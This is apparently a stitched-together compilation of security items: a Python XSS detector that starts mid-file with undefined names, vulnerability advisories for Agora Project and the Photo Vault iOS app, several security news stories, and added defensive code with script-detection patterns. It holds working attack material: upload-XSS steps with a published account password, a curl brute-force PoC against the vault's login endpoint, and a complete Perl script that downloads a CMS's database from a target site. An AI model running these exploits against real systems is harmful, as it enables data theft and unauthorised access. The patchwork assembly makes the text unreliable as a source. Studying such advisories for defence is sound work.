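HANDLER = re.compile(r"\bon[a-z]+\s*=", re.I)     # onload=, onerror=, onmouseover= ...
SCHEME = re.compile(r"^\s*javascript\s*:", re.I)  # a javascript: URL in a field later used as a link


def suspicious(value: str) -> List[str]:
    """Reasons a string value looks like active content rather than data; empty if clean."""
    reasons = []
    if MARKUP.search(value):
        reasons.append("markup")
    if HANDLER.search(value):
        reasons.append("event-handler")
    if SCHEME.search(value):
        reasons.append("javascript-url")
    return reasons


def walk(obj, path: str = "") -> Iterator[Tuple[str, str]]:
    """Yield (json_path, value) for every string leaf, descending into nested objects and arrays."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from walk(value, f"{path}.{key}" if path else key)
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from walk(value, f"{path}[{index}]")
    elif isinstance(obj, str):
        yield path, obj


def audit_record(record_json: str) -> Dict[str, List[str]]:
    """Map the path of every suspicious field to the reasons it was flagged."""
    findings = {}
    for path, value in walk(json.loads(record_json)):
        reasons = suspicious(value)
        if reasons:
            findings[path] = reasons
    return findings


if __name__ == "__main__":
    for path, reasons in audit_record(SAMPLE_CUSTOMER).items():
        print(f"{path}: {', '.join(reasons)}")
```

The patterns are deliberately narrow so that legitimate names with apostrophes, hyphens or a stray `<3` in a comment do not trip them; anything they do flag was written by someone who was not filling in a name.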

Security Risk:
==============
The security risk of the stored cross site scripting vulnerabilities in the shopware cms are estimated as medium. (CVSS 4.4)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] – Benjamin Kunz Mejri [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]

Agora Project 3.3.5 Cross Site Scripting

============================================================================================================================
| # Title : Agora project 3.3.5 XSS File upload Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 Fr V.(Pro) |
| # Vendor : https://www.agora-project.net/?ctrl=offline&action=download |
| # Dork : n/a |
============================================================================================================================

PoC:

[+] go to https://www.omnispace.fr/AP-OMNISPACE/index.php?ctrl=omnispace&action=recordCommand

[+] Register a new user space and follow the steps

[+] log in to your space or use my space: https://www.omnispace.fr/indoushka/ user : [email protected] & pass :112233az

[+] file manager https://www.omnispace.fr/indoushka/?ctrl=file

[+] choose your html or svg file and upload it

[+] here you can find your files

https://www.omnispace.fr/indoushka/HEBERGEMENT/STOCK_FICHIERS/indoushka/modFile/
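The steps above rely on the file manager accepting an HTML or SVG upload and then serving it from the application's own origin. The following added example is not Agora Project code; it shows the two server-side controls a defender would want: a content check that flags active content regardless of the claimed extension, and response headers that force stored user files to download instead of rendering. The sample uploads are constructed bytes.

```python
import re

# Constructed sample uploads (not real files): a scripted SVG, a plain PNG
# header, and a JPEG-magic prefix followed by HTML that a sniffing browser
# could render.
SAMPLE_SVG = (b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg">'
              b'<script>alert(1)</script></svg>')
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_POLYGLOT = b"\xff\xd8\xff\xe0" + b"<html><body>rendered if sniffed</body></html>"

# Extensions a browser treats as documents with script capability.
_BLOCKED_EXT = {"html", "htm", "xhtml", "shtml", "svg", "svgz", "xml", "js"}

# Byte patterns that mark active content inside the first few KB of a file,
# so a ".jpg" that actually starts an HTML document is still caught.
_ACTIVE_MARKERS = re.compile(
    rb"<\s*(script|svg|html|iframe|object|embed|body|!doctype\s+html)\b|javascript:",
    re.IGNORECASE,
)


def is_active_content(filename: str, data: bytes) -> bool:
    """True if the upload could execute script when opened in a browser."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in _BLOCKED_EXT:
        return True
    # Skip a UTF-8 BOM and leading whitespace before looking at the head.
    head = data[:4096].lstrip(b"\xef\xbb\xbf \t\r\n")
    return _ACTIVE_MARKERS.search(head) is not None


def download_headers(filename: str) -> dict:
    """Response headers for serving any stored user file as a download only.

    Even if a file slipped past the upload check, these headers stop the
    browser from rendering it in the application's origin.
    """
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }


if __name__ == "__main__":
    for name, blob in [("logo.svg", SAMPLE_SVG), ("photo.png", SAMPLE_PNG),
                       ("photo.jpg", SAMPLE_POLYGLOT)]:
        print(name, "blocked" if is_active_content(name, blob) else "accepted")
```

Serving user files from a separate origin (a dedicated downloads host) adds a further layer that the headers alone do not provide.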

Greetz: jericho * Larry W. Cashdollar * shadow0075 * djroot.dz * Gjoko ‘LiquidWorm’ Krstic

OnePlus Confirms Credit Card Breach Impacted Up to 40,000 Customers

OnePlus has confirmed that up to 40,000 customers have been affected by a credit card breach, in the latest embarrassing misstep for the Chinese handset maker.

The news comes several days after OnePlus shut down credit card processing following complaints from customers about fraudulent charges landing on their cards after they bought products through OnePlus’s online store.

OnePlus offered an explanation of what had happened on its website.

“One of our systems was attacked, and a malicious script was injected into the payment page code to sniff out credit card info while it was being entered,” the company said. “The malicious script operated intermittently, capturing and sending data directly from the user’s browser. It has since been eliminated. We have quarantined the infected server and reinforced all relevant system structures.”

The affected users entered their card information on OnePlus’s store between mid-November and January. Customers who made purchases with a saved card “should not” be affected, OnePlus said. The same goes for ones who paid with PayPal or credit card via PayPal. Affected users will be offered a year of credit monitoring.

“We cannot apologize enough for letting something like this happen,” the company said. “We are eternally grateful to have such a vigilant and informed community, and it pains us to let you down.”

OnePlus’s investigation is continuing and it is working with local law enforcement. Perhaps more importantly to current and prospective customers, it is conducting a security audit and “working to implement a more secure credit card payment method.”

Some customers expressed unhappiness and concern over the data breach on Twitter.

OnePlus’s devices have often been dubbed “iPhone killers” for their combination of looks, functionality and price.

Credit card breaches are an unfortunate fact of modern life, but OnePlus was already riding a regularly cresting wave of bad publicity that has clashed with its devices’ popularity.

In November, a security researcher revealed that OnePlus had left a debugging tool on its phones that could give attackers root access to the devices. Security researcher Christopher Moore found in October that OnePlus was collecting large amounts of personally identifiable usage data without user consent. And in July, a software bug in the OnePlus 5 rebooted the phone when users made an emergency call.

Apple Preps ChaiOS iMessage Bug Fix for Next Week

UPDATE

The so-called ChaiOS message bug identified this week in Apple iOS devices will receive a fix with the rollout of the update for iOS 11.2.5, expected next week.

The update will address a flaw software developer Abraham Masri publicly identified in a tweet earlier this week, according to multiple published reports. The flaw causes the iMessage app on iOS devices to freeze, crash or restart.

Macs are also affected. A macOS High Sierra 10.13.3 update is expected later this month to fix the flaw.

Apple confirmed to Threatpost that an iOS software fix would be available next week. Apple didn’t divulge specifics on the fix; however, news site WCCFTECH and others confirm that iOS 11.2.5 Beta 6, released late Wednesday, fixes the bug.

The ChaiOS message bug, also called a “text bomb” flaw, made headlines Tuesday when Masri posted a hyperlink to code on his GitHub repository that triggered the flaw. Recipients of iMessage messages containing the link to the malicious code hosted on GitHub reported devices freezing and in some cases crashing. Recipients only needed to receive the malicious message for the flaw to work; clicking on the link wasn’t required.

Meanwhile, Mac users reported that the bug made their Safari browser crash or caused their systems to slow down.

Since the initial report, Masri has removed the malicious code from his GitHub repository, but there is concern the code may be reposted elsewhere.

The bug’s impact on systems appears to be mostly a nuisance, with no reported side effects other than system freezes, crashes and restarts. Recipients of the malicious hyperlink need to quit the iMessaging app and delete the conversation to correct the problem.

According to Masri, the flaw takes advantage of Apple software developer guidelines that allow a programmer to insert extra characters into a website’s HTML in order to customize the thumbnail image and title shown in hyperlink previews inside the iMessage app.

Masri was able to create iMessage “text bombs” by putting hundreds of thousands of characters into a webpage’s metadata instead of just a few. That overloaded the app and caused iOS and macOS to generate multiple errors.
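The failure mode described above is a link-preview fetcher that trusts whatever length of metadata a page declares. The following added example (not Apple's code, and not Masri's) shows the defensive side: a preview extractor that caps both the amount of HTML it reads and the length of each metadata field it will render. The sample page bytes are constructed.

```python
from html.parser import HTMLParser

MAX_HTML_BYTES = 256 * 1024   # stop reading a page after this much input
MAX_FIELD_CHARS = 300         # longest title/description we will ever render
PREVIEW_KEYS = ("og:title", "og:description", "og:image")


class _MetaCollector(HTMLParser):
    """Collects Open Graph <meta> tags, truncating oversized values."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self.truncated = False

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = dict(attrs)
        key = a.get("property") or a.get("name")
        content = a.get("content")
        if key not in PREVIEW_KEYS or content is None:
            return
        if len(content) > MAX_FIELD_CHARS:
            self.truncated = True
            content = content[:MAX_FIELD_CHARS]
        self.fields.setdefault(key, content)   # first occurrence wins


def extract_preview(html: bytes) -> dict:
    """Return bounded preview fields plus flags saying what was clamped."""
    oversized = len(html) > MAX_HTML_BYTES
    if oversized:
        html = html[:MAX_HTML_BYTES]
    parser = _MetaCollector()
    parser.feed(html.decode("utf-8", "replace"))
    return {"fields": parser.fields, "truncated": parser.truncated,
            "oversized": oversized}


# Constructed sample page: a normal title and a description far beyond the cap.
SAMPLE_PAGE = (b'<html><head><meta property="og:title" content="Hello">'
               b'<meta property="og:description" content="' + b"A" * 500 +
               b'"></head><body></body></html>')

if __name__ == "__main__":
    result = extract_preview(SAMPLE_PAGE)
    print(len(result["fields"]["og:description"]), result["truncated"])
```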

(This story was updated 1/19/18 at 2:30 pm ET to include Apple’s confirmation of a software fix.)

Intel – Meltdown and Spectre patches have a variable impact and can cause unwanted reboots


Meltdown and Spectre patches have a variable impact and can cause unwanted reboots, Intel warns

According to the tech giant, systems with several types of processors running the Meltdown and Spectre patches may experience more frequent reboots.

A few days ago Intel reported that extensive tests conducted on home and business PCs showed a negligible performance impact on these types of systems (from 2 up to 14%).

Now the vendor has conducted performance tests on data center systems, and the results show that the performance impact depends on the system configuration and the workload.

“As expected, our testing results to date show performance impact that ranges depending on specific workloads and configurations. Generally speaking, the workloads that incorporate a larger number of user/kernel privilege changes and spend a significant amount of time in privileged mode will be more adversely impacted.” reads the analysis conducted by Intel.

Impacts ranged from 0-2% on industry-standard measures of integer and floating point throughput, Linpack, STREAM, server-side Java and energy-efficiency benchmarks. These benchmarks cover typical workloads for enterprise and cloud customers.

Intel also evaluated the impact on online transaction processing (OLTP), estimating it at roughly 4%.

Storage benchmarks showed a strong dependence on the benchmark, test setup and system configuration.

For FlexibleIO, which simulates various I/O workloads, throughput performance decreased by 18% when the CPU was stressed, but there was no impact when CPU usage was low.

The FlexibleIO tests were conducted using different benchmarks simulating different types of I/O loads; the results depend on many factors, including read/write mix, block size, drives and CPU utilization.

“For FlexibleIO, a benchmark simulating different types of I/O loads, results depend on many factors, including read/write mix, block size, drives and CPU utilization. When we conducted testing to stress the CPU (100% write case), we saw an 18% decrease in throughput performance because there was not CPU utilization headroom.” continues the analysis. “When we used a 70/30 read/write model, we saw a 2% decrease in throughput performance. When CPU utilization was low (100% read case), as is the case with common storage provisioning, we saw an increase in CPU utilization, but no throughput performance impact.”

The most severe performance degradation was observed during Storage Performance Development Kit (SPDK) tests: using iSCSI, the degradation reached 25% when only a single core was used. There was no performance degradation when SPDK vHost was used.

Intel also reported that the Meltdown and Spectre patches are causing more frequent reboots; this behavior was observed on systems running Broadwell-, Haswell-, Ivy Bridge-, Sandy Bridge-, Skylake- and Kaby Lake-based platforms.

“We have reproduced these issues internally and are making progress toward identifying the root cause. In parallel, we will be providing beta microcode to vendors for validation by next week,” said Navin Shenoy, executive vice president and general manager of Intel’s Data Center Group.

Only Intel’s newest 8th-gen Coffee Lake CPUs appear to be unaffected by the reboots.

Pierluigi Paganini

(Security Affairs – Meltdown and Spectre patches, Intel)

http://securityaffairs.co/wordpress/67905/breaking-news/meltdown-and-spectre-patches.html

Lenovo Releases Security Advisory

Original release date: January 19, 2018

Lenovo has released security updates to address a vulnerability affecting Enterprise Network Operating System (ENOS) firmware. An attacker could exploit this vulnerability to obtain sensitive information.

NCCIC/US-CERT encourages users and administrators to review the Lenovo Security Advisory for more information and apply the necessary updates or mitigations.



Photo Vault 1.2 Brute Forcing Issue

Document Title:
===============
Photo Vault v1.2 iOS – Insecure Authentication Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2110

Release Date:
=============
2018-01-16

Vulnerability Laboratory ID (VL-ID):
====================================
2110

Common Vulnerability Scoring System:
====================================
4.8

Vulnerability Class:
====================
Insecure Storage of Sensitive Information

Current Estimated Price:
========================
1.000€ – 2.000€

Product & Service Introduction:
===============================
https://itunes.apple.com/us/app/id1053383947

Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered an insecure authentication issue in the official

Vulnerability Disclosure Timeline:
==================================
2018-01-16: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
PhotoRange
Product: Photo Vault – Mobile (Web-Application) 1.2

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
An insecure configuration vulnerability has been discovered in the official Photo Vault v1.2 iOS mobile web-application.

The vulnerability is located in the login mechanism and the password request communication. When the app's wifi sharing
feature is activated, the protected vault can be accessed remotely through the built-in http server by supplying a password.
The password request is a weakly protected GET of the login.html file, with underscores separating the file name from the
password (`login.html__<password>`). There is no request limitation to block automated attacks.

Attackers can quickly enumerate the password by auditing the http basic authentication mechanism. Remote attackers can run
an automated dictionary attack or a manual http bruteforce attack via curl, nmap or http-brute. Attackers can thus quickly
gain unauthorized access to the private vault over the activated wifi web-application from the same network. A second, minor
problem is that https is not activated for the wifi http-server communication in the network. Taken together, these two
problems pose a significant risk to users, given the sensitive information stored in the vault of the mobile iOS application.

The security risk of the insecure authentication configuration vulnerability is estimated as medium with a CVSS score of 4.8.
Exploitation of the vulnerability requires network access to the web-server via wifi and no user interaction.
Successful exploitation of the vulnerability results in unauthorized access to private vault data or sensitive information.
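The issue described above is the absence of any request limitation on the `login.html__<password>` endpoint, which also means each guess leaves a distinct line in the http server's access log. The following added example (not part of the advisory or the Photo Vault app) is detection logic a defender could run over such a log: it parses the guess attempts per client and flags any client exceeding a threshold within a sliding time window. The log format and the lines below are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed access-log lines (Common Log Format style, not from the app).
# Client .20 makes six guesses in six seconds; client .33 makes one.
SAMPLE_LOG = """\
192.168.1.20 - - [06/Jan/2018:15:06:20 +0000] "GET /login.html HTTP/1.1" 200 512
192.168.1.20 - - [06/Jan/2018:15:06:26 +0000] "GET /login.html__passwd1 HTTP/1.1" 200 512
192.168.1.20 - - [06/Jan/2018:15:06:27 +0000] "GET /login.html__passwd2 HTTP/1.1" 200 512
192.168.1.20 - - [06/Jan/2018:15:06:28 +0000] "GET /login.html__passwd3 HTTP/1.1" 200 512
192.168.1.20 - - [06/Jan/2018:15:06:29 +0000] "GET /login.html__passwd4 HTTP/1.1" 200 512
192.168.1.20 - - [06/Jan/2018:15:06:30 +0000] "GET /login.html__passwd5 HTTP/1.1" 200 512
192.168.1.20 - - [06/Jan/2018:15:06:31 +0000] "GET /login.html__passwd6 HTTP/1.1" 200 512
192.168.1.33 - - [06/Jan/2018:15:07:00 +0000] "GET /login.html__correct HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# The app's password request: login.html followed by "__" and the candidate.
ATTEMPT_RE = re.compile(r"^/login\.html__(?P<candidate>.+)$")


def parse_attempts(log_text):
    """Yield (ip, timestamp, candidate) for every password attempt in the log."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        a = ATTEMPT_RE.match(m["path"])
        if not a:
            continue  # a plain login page load is not a guess
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        yield m["ip"], ts, a["candidate"]


def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: peak_attempts} for clients exceeding the threshold in any window."""
    per_ip = defaultdict(list)
    for ip, ts, _ in parse_attempts(log_text):
        per_ip[ip].append(ts)
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        peak, start = 0, 0
        for end in range(len(times)):          # sliding window over sorted times
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG))   # {'192.168.1.20': 6}
```

The same window counter, applied at request time inside the http server, is the missing request limitation: a client over the threshold gets a delayed or rejected response instead of another guess.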

Proof of Concept (PoC):
=======================
The security issue can be exploited by remote attackers without a privileged user account or user interaction.
For a security demonstration, or to reproduce the vulnerability, follow the information and steps below.

PoC:
http_code=$(curl -L --data "password=passwords.txt" "http://localhost:9900/login.html__" -w '%{http_code}' -o /root/fuzztime -s) # forensic

— PoC Session Logs [GET] —
GET http://localhost:9900/login.html
Host: Localhost:9900
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://Localhost:9900/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Date: Sat, 06 Jan 2018 15:06:20 GMT
Accept-Ranges: bytes
Transfer-Encoding: chunked
Note: Requests first the login page

GET http://localhost:9900/login.html__passwd1
Host: Localhost:9900
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:9900/login.html
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Date: Sat, 06 Jan 2018 15:06:26 GMT
Accept-Ranges: bytes
Transfer-Encoding: chunked

Note: Access to the vault of the iOS mobile application was cracked in a forensic access test within 15 minutes.

Reference(s):
http://localhost:9900/
http://localhost:9900/login.html
http://localhost:9900/login.html__

Security Risk:
==============
The security risk of the vulnerability in the mobile vault application is estimated as medium (CVSS 4.8).

Credits & Authors:
==================
Benjamin K.M. [[email protected]] – https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


VULNERABILITY LABORATORY – ADMIN TEAM
SERVICE: www.vulnerability-lab.com

Simple ASC CMS 1.2 Database Disclosure

========================================================================
| # Title : Simple ASC CMS 1.2 Database Disclosure Exploit
| # Author : indoushka
| # email : [email protected]
| # Tested on : windows 8.1 Français V.(Pro)
| # Vendor : http://www.aspsource.org
========================================================================

#!/usr/bin/perl -w
# Author : indoushka

use LWP::Simple;
use LWP::UserAgent;

# Console cosmetics for a Windows shell: clear the screen, set the window
# title and the text colour.
system('cls');
system('title Simple ASC CMS 1.2 Database Disclosure Exploit');
system('color a');

if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

# The Access database of the CMS sits at a fixed path below the web root.
$File="db/asc.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Fuck you wait!!! \n\n";

# Request the file and stream the body straight to disk.
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/asc.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/asc.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}